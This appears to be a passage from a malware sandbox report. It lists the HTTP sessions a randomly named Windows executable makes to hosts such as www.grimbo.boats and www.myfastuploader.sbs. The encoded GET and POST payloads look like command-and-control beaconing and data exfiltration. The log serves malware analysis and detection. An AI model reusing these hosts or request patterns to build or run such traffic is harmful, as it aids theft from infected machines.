56 76 6b 6a 7a 4a 6b 34 31 75 53 52 44 6f 73 34 6e 57 4b 55 43 44 36 41 4f 57 32 5a 6a 52 35 61 77 32 31 54 4a 75 62 46 79 67 68 65 39 53 38 6d 5a 70 49 36 33 6f 48 4b 6d 75 78 35 6b 34 4e 71 6c 73 76 71 4e 42 50 33 4c 78 41 32 6d 34 53 68 4a 31 62 41 44 56 70 74 72 36 31 67 65 4e 44 6a 47 78 48 62 43 57 5a 6f 56 54 38 4b 55 42 39 48 51 44 41 48 6a 4f 66 51 76 4a 77 78 45 45 41 5a 65 44 33 2b 48 73 6c 4f 39 73 33 55 31 70 4a 5a 78 55 39 43 33 7a 49 30 2b 6a 74 51 74 77 2b 71 6a 38 67 68 56 57 6d 4f 50 75 4c 51 48 71 67 4b 6f 78 6e 35 42 4b 6c 31 61 79 39 62 36 49 66 48 56 6b 30 46 43 64 66 71 41 41 6c 4c 6b 52 6f 6a 64 7a 50 39 71 65 68 47 54 7a 46 75 58 70 53 67 63 2b 4a 33 4e 4d 43 63 50 48 75 55 48 6b 47 2b 4e 56 48 35 6b 30 55 39 35 32 56 53 [TRUNCATED] Data Ascii: O2ePNNH0=O6Tl+xmXR7jUz2OPDAKIy25yVaVSuUkvECoxCl5NOj3mRVmDFIH/fDtxOK/QgkgQB3TKPYUiGkc7DVvkjzJk41uSRDos4nWKUCD6AOW2ZjR5aw21TJubFyghe9S8mZpI63oHKmux5k4NqlsvqNBP3LxA2m4ShJ1bADVptr61geNDjGxHbCWZoVT8KUB9HQDAHjOfQvJwxEEAZeD3+HslO9s3U1pJZxU9C3zI0+jtQtw+qj8ghVWmOPuLQHqgKoxn5BKl1ay9b6IfHVk0FCdfqAAlLkRojdzP9qehGTzFuXpSgc+J3NMCcPHuUHkG+NVH5k0U952VScel72ZJlZOoWuIo9d9gS42MzhttT8E6nbrzUvPPfgRch0Gujs96W4PFkTLOijY4D6QLB5ahYz8gjCKQQENdk9M5Nk0BKce8zjQMEJ+HuGLFEMjmgrBzuh7NSYvJs3Bm3m++FWdnuqD51b8IG9qtPQbuccz4S6FOyzk+Q6fnLr9Kp0vMRU0Zk+bHQLKiN193VRNEz1zaJkZjaE+ngQdvA9vJNvCJFLknTpoxkaRlW7nDJ+4RJBIq1/NhlOJGTheLGR5gsXtFAp9DwvqwIt3gdZVLJOg8OuZfo4BI0+rUjIe1evIWPZjLQvTDdb9bkFOIMo+n9GvfzPvHP69EZP3jL+8hghchslsobBh8DDiZq4wTBsVJXjYjQnclionQYbISMH6oDqhyzuqNZvMPx9Q3L8mrYtieRY222m/HD68FekKETcsFmyYzWY20287S0ywpSAkaap6hs6FsWaPm2xY4OrGDwUYEgm9zr3lboDNXjJWottR0xUZ4ujaf1XZcWsUGN9kcswVN6VNIzxoHNj8Gj9arQrHDgKJMbmqBNDCq2eJ6AkqlXjiGkdxsLUZJoeVBV5rj2G1JSMKED1SqMJOAZRILFu0YNSWHDyhZJ7zz7i6PaPeslY5Ip0emjr4Nh00ysNjPmH4w4gXK9x+VqDaPtZm2j6moitN+PJ+ [TRUNCATED]
Jan 6, 2025 16:03:48.789870024 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 06 Jan 2025 15:03:46 GMT location: https://www.myfastuploader.sbs/y3ui/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	60346	136.243.225.5	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:50.705981016 CET	485	OUT	GET /y3ui/?O2ePNNH0=D47F9HanQoviz06wAFaQpWJrQYA3sEREFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexSvKA2orqVGmRjW2S5mzIhwaahGiWa+bKDQAY6jSvIIBuw==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.myfastuploader.sbs Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:03:51.335700989 CET	1048	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 06 Jan 2025 15:03:48 GMT location: https://www.myfastuploader.sbs/y3ui/?O2ePNNH0=D47F9HanQoviz06wAFaQpWJrQYA3sEREFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexSvKA2orqVGmRjW2S5mzIhwaahGiWa+bKDQAY6jSvIIBuw==&56-H=2t2xuzpX2 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	60379	172.67.182.198	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:56.431530952 CET	736	OUT	POST /mjs1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.grimbo.boats Origin: http://www.grimbo.boats Referer: http://www.grimbo.boats/mjs1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 4c 58 4a 66 69 58 6e 52 53 39 43 48 76 71 5a 69 6a 43 4d 72 77 5a 63 57 30 45 71 6b 6c 78 52 52 46 30 78 2b 4c 4e 43 4f 47 32 56 39 72 73 75 45 6c 6e 2f 50 33 51 66 6f 58 76 66 57 72 6e 65 4d 31 39 50 38 72 75 39 42 45 52 6f 32 65 36 64 58 68 49 38 71 78 56 4d 45 75 4d 39 43 36 4c 46 35 44 61 6b 34 70 63 57 37 5a 50 39 68 41 4a 77 71 44 6c 30 67 65 63 4e 76 6f 6b 63 30 43 59 6d 6c 50 4e 57 77 56 30 70 72 42 38 61 6d 59 51 36 53 6c 32 57 6c 79 4b 5a 53 72 71 67 4a 53 6f 73 43 6d 2b 72 71 36 56 46 33 65 41 68 48 4b 33 42 62 77 41 2b 73 4d 39 7a 42 42 38 59 7a 58 69 2f 58 71 72 65 39 31 55 49 3d Data Ascii: O2ePNNH0=LXJfiXnRS9CHvqZijCMrwZcW0EqklxRRF0x+LNCOG2V9rsuEln/P3QfoXvfWrneM19P8ru9BERo2e6dXhI8qxVMEuM9C6LF5Dak4pcW7ZP9hAJwqDl0gecNvokc0CYmlPNWwV0prB8amYQ6Sl2WlyKZSrqgJSosCm+rq6VF3eAhHK3BbwA+sM9zBB8YzXi/Xqre91UI=
Jan 6, 2025 16:03:57.099710941 CET	1101	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 15:03:57 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3SlmGBXOWSy%2Br0cjcj1bgGJiJ2dJCTLb8L%2BVrTl5ukPQJND%2FPA65VzWX1WUCFUahiG99EIJ4iWnZTAlXtKa9%2FVVOxTdH1Nd%2B%2FoYjoiJgo5F4joBR8C1uNAvb2nc9GYp66D%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fdc99043b83437a-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12379&min_rtt=12379&rtt_var=6189&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=736&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\b^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	60394	172.67.182.198	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:03:58.975280046 CET	756	OUT	POST /mjs1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.grimbo.boats Origin: http://www.grimbo.boats Referer: http://www.grimbo.boats/mjs1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 4c 58 4a 66 69 58 6e 52 53 39 43 48 75 4c 70 69 76 44 4d 72 34 5a 63 56 6f 55 71 6b 38 42 52 56 46 30 31 2b 4c 50 79 65 47 45 78 39 6f 4e 65 45 6b 6d 2f 50 32 51 66 6f 64 50 66 54 6d 48 65 4c 31 39 44 61 72 71 31 42 45 52 73 32 65 37 4e 58 68 2f 51 74 2b 6c 4d 47 37 63 39 41 2b 4c 46 35 44 61 6b 34 70 63 44 65 5a 50 6c 68 41 35 67 71 43 42 67 76 41 73 4e 6f 76 6b 63 30 54 6f 6d 62 50 4e 57 65 56 31 46 53 42 36 65 6d 59 53 79 53 6c 6e 57 6b 39 4b 5a 75 6c 4b 68 70 61 49 70 55 68 5a 54 39 32 44 64 7a 64 78 64 75 50 42 77 78 71 69 32 71 50 39 62 71 42 2f 77 46 53 56 69 2f 77 49 4f 4e 72 44 66 43 53 4c 5a 75 57 78 67 55 4f 75 48 64 41 7a 6f 37 51 43 39 39 Data Ascii: O2ePNNH0=LXJfiXnRS9CHuLpivDMr4ZcVoUqk8BRVF01+LPyeGEx9oNeEkm/P2QfodPfTmHeL19Darq1BERs2e7NXh/Qt+lMG7c9A+LF5Dak4pcDeZPlhA5gqCBgvAsNovkc0TombPNWeV1FSB6emYSySlnWk9KZulKhpaIpUhZT92DdzdxduPBwxqi2qP9bqB/wFSVi/wIONrDfCSLZuWxgUOuHdAzo7QC99
Jan 6, 2025 16:03:59.670411110 CET	1095	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 15:03:59 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKBYc%2FeGg%2BbVDLbiNNL%2FVoEP9%2FxFGa41Oyb3C7%2BfqedE3UaSqpjVM1WnpKJwS%2B%2F1p1dksidfLpGJHdLnvxNYV8Y8EpFIe%2FwFaC9yr4J2m4WaVgKiDjPTfsbTEoZAq%2Fqh8Rp8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fdc99143d715e73-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=860&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=756&delivery_rate=0&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	60413	172.67.182.198	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:01.558432102 CET	1773	OUT	POST /mjs1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.grimbo.boats Origin: http://www.grimbo.boats Referer: http://www.grimbo.boats/mjs1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 4c 58 4a 66 69 58 6e 52 53 39 43 48 75 4c 70 69 76 44 4d 72 34 5a 63 56 6f 55 71 6b 38 42 52 56 46 30 31 2b 4c 50 79 65 47 45 35 39 6f 37 4b 45 6d 42 54 50 78 51 66 6f 65 50 66 53 6d 48 66 4f 31 2b 7a 65 72 71 78 37 45 54 6b 32 65 5a 56 58 70 74 6f 74 6c 31 4d 47 35 63 39 4e 36 4c 46 57 44 63 45 38 70 63 54 65 5a 50 6c 68 41 37 6f 71 42 56 30 76 43 73 4e 76 6f 6b 63 77 43 59 6d 67 50 4d 2b 6f 56 31 78 64 42 4b 2b 6d 59 79 69 53 6e 56 4f 6b 77 4b 5a 57 6d 4b 68 4c 61 4a 55 4b 68 5a 6d 45 32 44 42 5a 64 32 35 75 4d 6b 68 41 31 68 53 32 59 63 48 46 45 50 45 32 4b 6a 2b 5a 79 75 61 44 68 6b 7a 42 57 65 70 43 65 78 39 64 63 39 43 58 5a 30 78 67 5a 30 30 7a 74 48 4b 77 4e 32 39 42 79 44 75 56 68 31 4b 70 67 46 68 70 6f 74 57 51 4d 7a 71 52 2f 53 67 39 33 33 55 36 34 38 39 70 71 61 4b 2f 43 55 72 36 6e 35 7a 46 63 6a 4e 51 4f 30 65 31 59 6e 68 30 37 53 61 74 35 64 73 50 67 43 45 73 65 67 78 42 4f 51 6b 41 4f 55 54 30 76 38 53 55 32 63 79 2f 38 39 7a 62 63 37 4a 2f 36 68 75 73 4d [TRUNCATED] Data Ascii: O2ePNNH0=LXJfiXnRS9CHuLpivDMr4ZcVoUqk8BRVF01+LPyeGE59o7KEmBTPxQfoePfSmHfO1+zerqx7ETk2eZVXptotl1MG5c9N6LFWDcE8pcTeZPlhA7oqBV0vCsNvokcwCYmgPM+oV1xdBK+mYyiSnVOkwKZWmKhLaJUKhZmE2DBZd25uMkhA1hS2YcHFEPE2Kj+ZyuaDhkzBWepCex9dc9CXZ0xgZ00ztHKwN29ByDuVh1KpgFhpotWQMzqR/Sg933U6489pqaK/CUr6n5zFcjNQO0e1Ynh07Sat5dsPgCEsegxBOQkAOUT0v8SU2cy/89zbc7J/6husM3FoqK56ezL7FZ879IS7VhSqXYMTHMcw9rvP2Vxj4TvGo8hgKvTTFD7ejIpvegXYFkkCOh3pkVzOEFkIxjztSNgPs956AsnX7nDIPEs3J9m1R3JI3uJsoU9l4i6Q5zNQYHh1Bq3VdCPebYUtS6jI3Jbb/+Tt+mhNvl0+TetbVPoYxNOTvsqHohfKEz2NzWCp/8H79v/XKnWwZkJKktIJCJNFQt68e1qG3wR2YUxbvk7qjgm6+GBVHa2eAXAvJOhy4qy2SXznQuY6uWoLu9yTQsKbA0jFNx5x0Y7bpz6ROXqNXItYjSHDweX4QuvW5kIEJHQaFIzX8EIkHE3R8WU2L1npnknahgZywIM/NMVwwpkFtihY6fXZQcPwAeqGFhspRZTkssa0TQEQgjUNkrqGl6kdFewkukzJT2wkxQThyocXKTnnOjSo30orUJbUhlpPMM9o90NZdLHf9wBrchIsS1+bVEiW7zoUqmTPo/br8WAzQYH8OHDOk6fcJz4ZsHIk8aS96RS6UMn7PI7yG5wvNm2OydrDCVGv+WQ30tAtyOM3hT6wPY5nm0PnQckErcqlSY5S5j1syoDaCQsWwkoTkZS9aPrW4aFm/BBT4Gig+iSVgG0qeuGZktz0X2wxj3Ob0ybUTSTNWwklbZvHkzsKRqtqrA6oMTNjEur [TRUNCATED]
Jan 6, 2025 16:04:02.224670887 CET	1080	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 15:04:02 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R0J1lHsiHsSPxXAsTP3bQrtkNWLYto9nguX7eEzsvHJ5oSYHMPe4SPwXvXy2bpD4qXhJgUERZlpPp0vKM5W0ygV8xAjknQSrwSXP7kmKf1ninbuy%2BUPVjpj0Ndl7btrJCns2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fdc99243fce42cc-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1773&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	60430	172.67.182.198	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:04.093679905 CET	479	OUT	GET /mjs1/?O2ePNNH0=GVh/hhHQVOm9lJhitzwoqNkD8zboxSkQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4yZhvM15q69RepVJzrWBIP8UGaM9HjMvRNhgw0A0DI7CbA==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.grimbo.boats Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:04:04.751343966 CET	1101	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 15:04:04 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xLPVvF3zvD5lRTMkpHq97njE%2BSvaA1BWtSvRB3jPjXLMdKkSqkcd3ts%2B2CfQ1%2FhgEuUnryCuUXtNUlfh9dsjV04%2BL7ifgqzN2f0PsWkJl3Fnf753fdRZLtu5Us5ZjUrMIeaz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fdc99342e0715cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=479&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
